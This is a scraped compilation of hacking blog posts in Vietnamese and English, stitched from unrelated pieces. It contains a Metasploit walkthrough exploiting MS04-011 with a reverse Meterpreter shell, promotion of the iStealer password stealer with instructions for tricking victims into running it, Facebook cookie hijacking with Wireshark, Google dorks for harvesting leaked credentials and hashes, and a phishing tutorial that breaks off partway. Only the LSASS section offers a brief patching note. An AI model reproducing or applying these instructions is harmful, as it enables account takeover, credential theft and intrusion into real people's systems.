Bắt đầu một phiên làm việc với channel vừa thiết lập với remote machine
initcrypt cipher [parameters]
Mã hoá dữ liệu được gửi giữa host và remote machine
Sử dụng module Fs: cho phép upload và download files từ các remote machine
cd directory
giống lệnh cd của commandline
getcwd
cho biết thư mục đang làm việc hiện tại
ls [filter_string]
liệt kê các thư mục và tập tin
upload src1 [src2 ...] dst
upload file

download src1 [src2 ...] dst
download file
Sử dụng module Net:
ipconfig
route
xem bảng định tuyến của remote machine
portfwd [ -arv ] [ -L laddr ] [ -l lport ] [ -h rhost ] [ -p rport ] [ -P ]
cho phép tạo port forward giữa host và remote machine
Sử dụng module Process:
execute -f file [ -a args ] [ -Hc ]
câu lệnh execute cho phép bạn tạo ra một process mới trên remote machine và sử dụng process đó để khai thác dữ liệu
kill pid1 pid2 pid3
huỷ những processes đang chạy trên máy remote machine
ps
liệt kê những process của remote machine
Sử dụng module Sys:
getuid
cho biết username hiện tại của remote machine
sysinfo
cho biết thông tin về computername, OS
5)Ví dụ:
Máy localhost có địa chỉ 192.168.1.1 sẽ tấn công máy remote có địa chỉ 192.168.1.2 thông qua lỗi Lsass_ms04_011. Đây là lỗi tràn stack trong dịch vụ LSA( Local Security Authority).Lsass.exe là một process của hệ thống Microsoft Windows, chịu trách nhiệm về chứng thực local security, quản lý Active Directory và các chính sách login. Lsass kiểm sóat việc chứng thực của cả client và server.
Msf>use Lsass_ms04_011
Msf>set PAYLOAD win32_reverse_meterpreter
Msf>set RHOST 192.168.1.2
Msf>set LHOST 192.168.1.1
Msf>exploit
Meterpreter> help
Meterpreter>use -m Process //add thêm tập lệnh của process
Meterpreter>help // xem các lệnh meterpreter hỗ trợ
Meterpreter>ps // list các process mà remote machine đang chạy
Meterpreter>kill // tắt các process mà remote machine đang chạy
Meterpreter> execute -f cmd –c //tấn công sử dụng comandline cmd của remote machine
execute: success, process id is 3516.
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1…
interact: Started interactive channel 1.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS>echo Meterpreter interactive channel in action
echo Meterpreter interactive channel in action
Meterpreter interactive channel in action
C:\WINDOWS>ipconfig
Caught Ctrl-C, close interactive session? [y/N] y
meterpreter>
6)Cách phòng chống
Thường xuyên cập nhật các bản vá lỗi của Microsofts. Ví dụ như để Metasploit không thể khai thác được lỗi Lsass_ms04_011, bạn phải cập nhật bản vá lỗi của Microsoft. Theo Microsoft đánh giá, đây là một lỗi nghiêm trọng, có trên hầu hết tất cả các hệ điều hành windows. Bạn nên sử dụng hotfix có number là 835732 để vá lỗi trên.

nguồn:vhbgroup.net

Exploit win7-xp dùng browser autopwn với backtrack5

Bước 1:Vào terminal với quyền root
nhập:msfconsole
tiếp tục

Thứ Ba, 1 tháng 1, 2013

How to Copy Text from Text Copy Protected sites

How to Copy Text from Text Copy Protected sites 
well i was think do this with snap shots and well explained . but i'm not going to do that because simple text is enough for this .

Probably most of you should know Copy Protected sites doing that using JavaScript , (mostly blogs)

and pretty sure most time you wanted to be a leecher

well it isn't much


Just Use a Proxy server to visit the site with disable the JavaScript
ex: http://www.proxyserver.com/

and without that , you can use the js on your web browser address bar

Code:
javascript:void(document.onselectstart=null)
as i tested disabling js on browser not worked neither Noscript works

and also you can goto save as.. and save it as PDF file

iStealer 6.3 Legends

iStealer 6.3 Legends : Hack Facebook, Twitter Password "TUTORIALS"



Istealer is an efficient windows password stealer software used for hacking various email account password such paypal password hacking, facebook password hacking etc. I have already explained about RATs and keyloggers to hack email account passwords, where you have to send your keylogged file to victim. In the same way, Istealer can be used to hack email account password and find passwords of various emails. I have provided link for software download. Using Istealer you can easily hack or steal the password of Twitter account, Facebook Account, Gmail Account, Hotmail Account, Yahoo Accounts and many other account password easily.
Basically, in this trick you create server file which is used to capture the keystrokes of your slave, after creating server file you have to send that file to slave and use a bit of social engineering to get them to click on the server file and run the server file. Once the server file is run, it will start his working like capturing keystrokes etc.




Hack Facebook Accounts : [Hijacking and Stealing Cookies Session]


Cookie is a HTTP cookie or a web, which is used for admin sensitive information access.
There are many various and different Programs which are used for stealing cookies but the best and the easiest is Wireshark.

So Lets Start Facebook Cookies Stealing Method

1) Download and install the Program  wireshark

2) Now Run the Program and go to interfaces and push the button start.


3) Wait 10 minutes for finding out the cookies and sessions which are opened recently.

4) After 10 minutes all the cookies and sessions will open and display. Now You just have to enter the code in filter box  http.cookie contains “datr” and hit enter.

Usb hacking turn any usb into keylogger


Unlimited amount of keylogs over a billion can be stored using this undetectable and portable keylogger. The storage of logs and information is in the form of (FAT) file system. This keylogger works with any sort of computer and keyboard that you may have: Dell, Hp, or PS/2 or USB. 

  • Fast File and Info transfer, up to 148kB/s
  • Invisible/Undetectable
  • No Processing Power
  • Portable
  • No installation Required 
  • Can't be manually erased

Danh sách 1 số account facebook ,gmail lấy bằng Plishing 2012

Bước 1: vào site google.com
Bước 2: Dùng 1 số dork
dork1: intext:charset_test= email= default_persistent=
dork2: inurl:"passes" OR inurl:"passwords" OR inurl:"credentials" -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff
 Ta nhận đc


Lấy account mail sử dụng google

Bước 1: vào google
Bước 2: sử dụng một số dork sau đây

ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e
ext:sql intext:”INSERT INTO” intext:@hotmail.com intext:password
ext:sql intext:@hotmail.com intext:password



Hack FaceBook Gmail Yahoo and Twitter Account By BACKTRACK 5


Hello Friends, i think you would have done work which that i am told you in my last post of BackTrack Series. Now i am bore so think why not share with you some interesting , so here i am going tell you a trick by which you must hack any FACEBOOK , GMAIL , YAHOO , TWITTER and any one yes any one Account of a Victim . I think you would know about Page Phishing very well if not so see my this post....

Phishing Attack-All In One Tool

In old trick you had done many steps like...

1.Take Copy of Login Page
2.Search the code line
3.Changing Code
4.Making Account on Web Hosting Site (Sometimes your account deleted by Hosting Site because you had used it for Phishing)
5.Wait for Web Hosting Site Account Verification
6.Uploading Login Page on Web Hosting Site
7.Send Link to Victim
8.Found the Victim Information

Means it is too time and difficult work for a newbie , So i think why not tell you Page Phishing Hacking in BT5,Interesting you Know,By this trick you found victim ID and Password by run some commands only,
So Let's Start...............

1.First Open your BT5 Terminal and for find your IP on Internet type "ifconfig" like me in below pic and i have found my IP 1.22.120.115 .